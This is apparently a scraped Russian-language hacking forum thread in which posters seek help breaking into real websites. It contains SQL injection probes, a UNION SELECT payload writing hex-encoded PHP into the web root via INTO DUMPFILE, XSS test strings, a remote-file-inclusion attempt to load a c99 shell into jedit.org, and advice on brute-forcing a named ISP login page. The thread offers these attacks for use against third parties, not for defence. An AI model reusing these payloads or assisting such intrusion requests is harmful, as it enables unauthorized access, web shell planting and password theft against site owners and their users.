ну инклудить мона файл паролей и сбрутить пароли потом приконектится и поиметь сурфордж, но я сильно сомневаюсь что админы сурсфорджа допустят это ((*
Code: mysql> select user from user where user = 'root' and exists (select * from db); +-------+ | user | +-------+ | root | +-------+ 1 row in set (0.00 sec) mysql> select user from user where user = 'root' and exists (select * from bugoga); ERROR 1146 (42S02): Table 'mysql.bugoga' doesn't exist mysql> select user from user where user = 'root' or 1=(select count(*) from db); +-------+ | user | +-------+ | forum | +-------+ 1 row in set (0.01 sec) mysql> select user from user where user = 'forum' or 1=(select count(*) from shit); ERROR 1146 (42S02): Table 'mysql.shit' doesn't exist .Slip, где здесь UNION и почему бы мне не заюзать такую структуру для проверки существования таблицы?
Это ты типа сейчас выебнулся что ли?:d Вообще то я уверен на 100% что он имел в виду SQL INJ а не базу под рутом с консольным доступом. Если что, то весь вывод через консоль делается без юниона. Но бля, ты мне выведи данные из sql inj без юниона (4/5 ветка например) и без подзапросов, я тебе памятник буду строить.
А какая разница-то? Ну введу я в адресную строку Code: http://site.ru/?id=1+and+exists+(select+*+from+db)/* Неужто, если в случае существования таблицы, мы не получим тот же результат, что и при id=1, а при отсутствии таблицы не выведется пустая страница или страница с ошибкой? Кстати, не говорилось "без подзапросов", говорилось "без UNION"
Привет! подскажите как взломать! если нет базы данных (MySql), вся инфа записуется, как я подозркваю в .Php фалы есть доступ в деректорию с картинками, например www.superpupersait.run/img/ М ожно просмотреть картинки, есть немного php файлов с текстом. При переходе в начальную директорию все нормально (сайт работает), как можно открыть сайт админа? Есть еще баг когда вводиш встраке www.superpupersait.run/superpupersait.php?id=qqq можно увидеть вверху на форме qqq может можно как то залить Shell файл через ссылук
результат '%22%3E%3Cscript%3Ealert()%3C/script%3E и в форме '\"\><script>alert()</script> поставили слэши зато я нашел php.ini в другой деректории и еще коечто как бы мне вытощить
Hi, Is it possible to dump something INTO Dumpfile, when magic_quotes_gpc is switched on? I tried to hex-encode the path, but no file is created then. e.g: www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/'/var/www'/* Works! But www.site.com/UNION/**/SELECT/**/0x3c3f70687020706870696e666f28293b203f3e /**/INTO/**/DUMPFILE/**/0x2f7661722f777777/* doesn work! Is there a possibility to dump files, if magic_quotes_gpc ist switched on? Thank you.
Вот нашел похожее даже круче http://fialki.ho.com.ua/products_pictures/ вот от создателей http://www.shop-script.ru/images/
Всем привет. Подскажите плз как настроить брутфорс доля взлома такой вот байды http://stat.corbina.com.ua/ Известен ник и известно что пароль только цыфры. Просьба помочь-долбался ничего не выходит .
А какой конкретно брут? Их навалом ).Например, тот же Brutus AET 2 (кажись так:РР).Там можно настроить по многим протоколам,кроме ссл,но для этого другие бруты есть. Гайдов по нему тоже полно( на русском кстати) .Там должны быть настройки полным перебором, по словарю(он те наф не нужен).И указан диапазон фицр в виде 0123456789.Что-то вроде того:Р
Warning: main(http://site/RamShellc99.php\0.html): failed to open stream: Connection refused in /home/groups/j/je/jedit/htdocs/index.php on line 63 Warning: main(): Failed opening 'http://site/RamShellc99.php\0.html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63 Имеется запрос: http://www.jedit.org/index.phppage=http://site/RamShellc99.php%00 В результате получается такое : Warning: main(): Failed opening 'http://site/RamShellc99.php\0.html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.php on line 63 Я так понял,тут две веши: 1.У меня жутко кривые куриные лапы. 2.Фильтрация %0 на \ 3.Какие-то проблемы с url- encoding ( ??? ) В данном случае, меня интересует , почему не заливается шелл =(. Про инклуды аля ../../../../../etc/pwd пожалуйста не надо)
Некоторые мысли... Скрипт их прибавляет расширение .html ко всему инклудящемуся, а %00 по-видимому не прокатывает. По идее, можно переименовать шелл в нечто вроде shell.html и заставить апач на удалённом хосте исполнять html как php, но даже в этом случае вылетает ошибка failed to open stream: Connection timed out, почему - не знаю. (пытался ко многим сайтам так обращаться, везде тайм-аут, даже к их собственному)
Может я ща чё ляпну, но шеллкод разве может исполняться в любом файле ? (шеллкод системная с*ка ) Мошь он просто выдаёт несоответствие расширений, и потому не исполняет. Ждём-с мнение экспертов ).
